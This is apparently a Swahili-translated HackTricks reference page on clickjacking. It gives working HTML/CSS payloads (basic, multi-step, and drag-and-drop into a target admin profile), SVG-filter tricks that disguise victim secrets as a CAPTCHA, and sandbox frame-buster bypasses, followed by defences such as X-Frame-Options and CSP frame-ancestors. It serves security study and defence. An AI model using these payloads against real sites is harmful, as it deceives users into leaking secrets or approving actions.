Clickjacking

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Nini ni Clickjacking

Katika shambulio la clickjacking, mtumiaji anamdanganywa kwa kubofya element kwenye ukurasa wa wavuti ambayo inaweza kuwa haionekani au iliyofichwa kama element nyingine. Uendeshaji huu unaweza kusababisha matokeo yasiyotarajiwa kwa mtumiaji, kama vile kupakua malware, kupeleka kwa kurasa za wavuti zenye madhara, kutoa nyaraka za kuingia au taarifa nyeti, uhamishaji wa pesa, au kununua bidhaa mtandaoni.

Mbinu ya kujaza fomu awali

Wakati mwingine inawezekana kujaza thamani za sehemu za fomu kwa kutumia GET parameters wakati wa kupakia ukurasa. Mshambuliaji anaweza kutumia tabia hii kujaza fomu kwa data yoyote na kutuma payload ya clickjacking ili mtumiaji abofye kitufe cha Submit.

Populate form with Drag&Drop

Ikiwa unahitaji mtumiaji kujaza fomu lakini hutaki kumuomba moja kwa moja aingize taarifa maalum (kama email au password maalum unayojua), unaweza kumuomba tu Drag&Drop kitu ambacho kitaandika data unayoidhibiti kama katika this example.

Basic Payload

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Payload ya hatua nyingi

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

Iwapo umebaini XSS attack that requires a user to click kwenye elementi fulani ili trigger XSS na ukurasa uko vulnerable to clickjacking, unaweza kuitumia kumdanganya mtumiaji kubonyeza button/link.
Mfano:
Umegundua self XSS katika baadhi ya maelezo ya kibinafsi ya akaunti (maelezo ambayo wewe pekee unaweza kuyeka na kuyasoma). Ukurasa wenye form wa kuweka maelezo haya uko vulnerable kwa Clickjacking na unaweza prepopulate form kwa GET parameters.
Mshambuliaji anaweza kuandaa shambulizi la Clickjacking kwa ukurasa huo akiprepopulate form na XSS payload na kumdanganya mtumiaji ili Submit fomu. Hivyo, when the form is submitted na thamani zikitabadilika, mtumiaji ataendesha XSS.

DoubleClickjacking

Kwanza explained in this post, mbinu hii itaomba victim kubonyeza mara mbili (double click) kwenye kitufe cha ukurasa maalum uliowekwa mahali fulani, na kutumia tofauti za timing kati ya mousedown na onclick events kupakua ukurasa wa victim wakati wa double click, hivyo victim actually clicks a legit button in the victim page.

Mfano unaweza kuonekana katika video hii: https://www.youtube.com/watch?v=4rGvRRMrD18

Mfano wa code unaweza kupatikana katika this page.

Warning

Mbinu hii inaruhusu kumdanganya mtumiaji kubonyeza mahali 1 kwenye ukurasa wa victim ukivuka kila ulinzi dhidi ya clickjacking. Kwa hivyo mshambuliaji anahitaji kupata vitendo nyeti vinavyoweza kufanywa kwa bonyeza moja tu, kama OAuth prompts za kukubali ruhusa.

SVG Filters / Cross-Origin Iframe UI Redressing

Modern Chromium/WebKit/Gecko builds yanaruhusu CSS filter:url(#id) kutumika kwa cross-origin iframes. Pikseli zilizorastrizwa za iframe zinaonyeshwa kwenye grafu ya filter ya SVG kama SourceGraphic, kwa hivyo primitives kama feDisplacementMap, feBlend, feComposite, feColorMatrix, feTile, feMorphology, n.k. zinaweza kupindua UI ya victim kwa njia yoyote kabla mtumiaji hajaiona, ingawa mshambuliaji hajagusa DOM. Filter rahisi ya Liquid-Glass inavyoonekana ni kama:

<iframe src="https://victim.example" style="filter:url(#displacementFilter4)"></iframe>
  • Misingi muhimu: feImage loads attacker bitmaps (kwa mfano, overlays, displacement maps); feFlood builds constant-color mattes; feOffset/feGaussianBlur refine highlights; feDisplacementMap refracts/warps maandishi; feComposite operator="arithmetic" implements arbitrary per-channel math (r = k1*i1*i2 + k2*i1 + k3*i2 + k4), which is enough for contrast boosting, masking, and AND/OR operations; feTile crops and replicates pixel probes; feMorphology grows/shrinks strokes; feColorMatrix moves luma into alpha to build precise masks.

Kupindisha siri kuwa maulizo ya mtindo wa CAPTCHA

Ikiwa framable endpoint inatoa siri (tokens, reset codes, API keys), mshambuliaji anaweza kuzipindisha ili zifanana na CAPTCHA na kulazimisha uandishi wa mkono:

<svg width="0" height="0">
<filter id="captchaFilter">
<feTurbulence type="turbulence" baseFrequency="0.03" numOctaves="4" result="noise" />
<feDisplacementMap in="SourceGraphic" in2="noise" scale="6" xChannelSelector="R" yChannelSelector="G" />
</filter>
</svg>
<iframe src="https://victim" style="filter:url(#captchaFilter)"></iframe>
<input pattern="^6c79 ?7261 ?706f ?6e79$" required>

The distorted pixels fool the user into “solving” the captcha inside the attacker-controlled <input> whose pattern enforces the real victim secret.

Kurekebisha muktadha wa pembejeo za mwathirika

Vichujio vinaweza kufuta kwa usahihi maandishi ya placeholder/validation huku vikihifadhi bonyezo za mtumiaji. Mchakato mmoja:

  1. feComposite operator="arithmetic" k2≈4 inazidisha mwangaza hivyo maandishi ya msaada ya kijivu yanageuka kuwa meupe.
  2. feTile inazuia eneo la kazi kwenye mstatili wa input.
  3. feMorphology operator="erode" inaleta unene kwa glyphs za giza zilizoandikwa na mwathirika na kuziweka kupitia result="thick".
  4. feFlood huunda sahani meupe, feBlend mode="difference" pamoja na thick, na feComposite k2≈100 ya pili huibadilisha kuwa matte ya luma kali.
  5. feColorMatrix huhamisha luma hiyo hadi alpha, na feComposite in="SourceGraphic" operator="in" huhifadhi glyphs zilizowekwa na mtumiaji pekee.
  6. Pia feBlend in2="white" pamoja na kukata nyembamba hutoa sanduku la maandishi safi, kisha mshambuliaji anaweka lebo zao za HTML (kwa mfano, “Ingiza barua pepe yako”) huku iframe iliyofichwa ikibaki kutekeleza sera ya nywila ya asili ya mwathirika.

Safari struggles with feTile; the same effect can be reproduced with spatial mattes built from feFlood + feColorMatrix + feComposite for WebKit-only payloads.

Uchunguzi wa pixel, mantiki na mashine za hali

Kwa kukata eneo la 2–4 px kwa feTile na kulitilia hadi 100% ya viewport, mshambuliaji hubadilisha rangi iliyochaguliwa kuwa texture kamili ya fremu inayoweza kuwekwa kizingiti (threshold) hadi maski ya boolean:

<filter id="pixelProbe">
<feTile x="313" y="141" width="4" height="4" />
<feTile x="0" y="0" width="100%" height="100%" result="probe" />
<feComposite in="probe" operator="arithmetic" k2="120" k4="-1" />
<feColorMatrix type="matrix" values="0 0 0 0 0  0 0 0 0 0  0 0 0 0 0  0 0 1 0 0" result="mask" />
<feGaussianBlur in="SourceGraphic" stdDeviation="2" />
<feComposite operator="in" in2="mask" />
<feBlend in2="SourceGraphic" />
</filter>

For arbitrary colors, a feFlood reference (e.g., #0B57D0) plus feBlend mode="difference" and another arithmetic composite (k2≈100, k4 as tolerance) outputs white only when the sampled pixel matches the target shade. Feeding these masks into feComposite with tuned k1..k4 yields logic gates: AND via k1=1, OR via k2=k3=1, XOR via feBlend mode="difference", NOT via blending against white. Chaining gates makes a full adder inside the filter graph, proving the pipeline is functionally complete.

Washambuliaji kwa hivyo wanaweza kusoma state ya UI bila JavaScript. Mfano wa boolean kutoka kwenye modal workflow:

  • D (dialog visible): chunguza pembe iliyokuwa giza na kagua dhidi ya nyeupe.
  • L (dialog loaded): chunguza koordinates ambapo kitufe kinaonekana mara itakapokuwa tayari.
  • C (checkbox checked): linganisha pikseli ya checkbox dhidi ya active blue #0B57D0.
  • R (red success/failure banner): tumia feMorphology na thresholds nyekundu ndani ya rectangle ya banner.

Kila state iliyogunduliwa huendesha overlay bitmap tofauti iliyowekwa kupitia feImage xlink:href="data:...". Kufunika (masking) bitmap hizo kwa D, L, C, R hufanya overlays zilingane na dialog halisi na kupeleka mwathiriwa kupitia workflows zenye hatua nyingi (urejeshaji nywila, idhini/approvals, uthibitisho wa hatua za uharibifu) bila kumwaga DOM.

Viendelezi vya kivinjari: DOM-based autofill clickjacking

Mbali na kuiframinga kurasa za mwathiriwa, washambuliaji wanaweza kulenga vipengele vya UI vya browser extension ambavyo vinaingizwa kwenye ukurasa. Password managers huonyesha dropdowns za autofill karibu na inputs zilizo kwenye focus; kwa kuweka focus kwenye uwanja unaodhibitiwa na mshambuliaji na kuficha/kuzuia dropdown ya extension (tricks za opacity/overlay/top-layer), klik iliyodhoofishwa ya mtumiaji inaweza kuchagua kipengee kilichohifadhiwa na kujaza data nyeti kwenye inputs zinazoendeshwa na mshambuliaji. Variant hii haihitaji iframe exposure na inafanya kazi kabisa kupitia DOM/CSS manipulation.

Strategies to Mitigate Clickjacking

Ulinzi upande wa mteja

Scripts zinazoendeshwa upande wa mteja zinaweza kuchukua hatua za kuzuia Clickjacking:

  • Kuhakikisha dirisha la application ndilo dirisha kuu au la juu.
  • Kufanya frames zote zioneke.
  • Kuzuia clicks kwenye frames zisizoonekana.
  • Kugundua na kuwatia alarmi watumiaji kuhusu jaribio la Clickjacking.

Hata hivyo, script hizi za kuvunja frame zinaweza kupitwa:

  • Browsers’ Security Settings: Vigezo vya usalama vya baadhi ya browser vinaweza kuzuia scripts hizi kulingana na mipangilio yao ya usalama au ukosefu wa msaada wa JavaScript.
  • HTML5 iframe sandbox Attribute: Mshambuliaji anaweza ku-neutralize frame buster scripts kwa kuweka sandbox attribute na thamani za allow-forms au allow-scripts bila allow-top-navigation. Hii inazuia iframe kuthibitisha kama ndilo dirisha la juu, e.g.,
<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

Thamani za allow-forms na allow-scripts zinawezesha vitendo ndani ya iframe huku zikitatiza top-level navigation. Ili kuhakikisha utendaji uliokusudiwa wa tovuti inayolengwa, ruhusa za ziada kama allow-same-origin na allow-modals zinaweza kuhitajika, kulingana na aina ya shambulio. Ujumbe za console za browser zinaweza kuelekeza ni ruhusa gani za kuruhusu.

Ulinzi wa upande wa seva

X-Frame-Options

The X-Frame-Options HTTP response header inaarifu vivinjari kuhusu uhalali wa kuonyesha ukurasa ndani ya <frame> au <iframe>, na kusaidia kuzuia Clickjacking:

  • X-Frame-Options: deny - Hakuna domain inaweza ku-frame maudhui.
  • X-Frame-Options: sameorigin - Tu tovuti ya sasa inaweza ku-frame maudhui.
  • X-Frame-Options: allow-from https://trusted.com - Tu ‘uri’ iliyotajwa inaweza ku-frame ukurasa.
  • Kumbuka vikwazo: ikiwa browser haitii directive hii, inaweza isifanye kazi. Vivinjari vingine vinapendelea directive ya CSP frame-ancestors.

Content Security Policy (CSP) frame-ancestors directive

frame-ancestors directive katika CSP ni njia inayoshauriwa kwa ulinzi wa Clickjacking:

  • frame-ancestors 'none' - Inafanana na X-Frame-Options: deny.
  • frame-ancestors 'self' - Inafanana na X-Frame-Options: sameorigin.
  • frame-ancestors trusted.com - Inafanana na X-Frame-Options: allow-from.

Kwa mfano, CSP ifuatayo inaruhusu ku-frame tu kutoka domain ile ile:

Content-Security-Policy: frame-ancestors 'self';

Maelezo zaidi na mifano tata yanaweza kupatikana katika the frame-ancestors CSP documentation and Mozilla’s CSP frame-ancestors documentation.

Content Security Policy (CSP) with child-src and frame-src

Content Security Policy (CSP) ni hatua ya usalama inayosaidia kuzuia Clickjacking na mashambulizi mengine ya kuingiza code kwa kubainisha vyanzo ambavyo browser inapaswa kuruhusu kupakia maudhui.

frame-src Directive

  • Inaeleza vyanzo halali kwa frames.
  • Maelekezo maalum zaidi kuliko directive ya default-src.
Content-Security-Policy: frame-src 'self' https://trusted-website.com;

Sera hii inaruhusu frames kutoka kwa asili ile ile (self) na https://trusted-website.com.

child-src Amri

  • Ilianzishwa katika CSP ngazi ya 2 ili kuainisha vyanzo vinavyoruhusiwa kwa web workers na frames.
  • Inafanya kazi kama mbadala kwa frame-src na worker-src.
Content-Security-Policy: child-src 'self' https://trusted-website.com;

Sera hii inaruhusu frames na workers kutoka kwa origin sawa (self) na https://trusted-website.com.

Vidokezo vya Matumizi:

  • Kuachishwa: child-src inaondolewa polepole na badilishwa na frame-src na worker-src.
  • Tabia ya dharura: Ikiwa frame-src haipo, child-src itatumika kama fallback kwa frames. Ikiwa zote mbili hazipo, default-src itatumika.
  • Ufafanuzi Mkali wa Chanzo: Jumuisha vyanzo vinavyotegemewa tu katika maelekezo ili kuzuia matumizi mabaya.

Skiripti za JavaScript za kuvunja frame

Ingawa si dhamana kamili, skiripti za JavaScript zinazovunja frame zinaweza kutumika kuzuia ukurasa wa wavuti kufungiwa ndani ya frame. Mfano:

if (top !== self) {
top.location = self.location
}

Kutumia Anti-CSRF Tokens

  • Uthibitishaji wa Tokeni: Tumia anti-CSRF tokens katika web applications kuhakikisha kuwa maombi yanayobadilisha hali yamefanywa kwa makusudi na mtumiaji na siyo kupitia ukurasa uliokuwa Clickjacked.

Marejeo

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks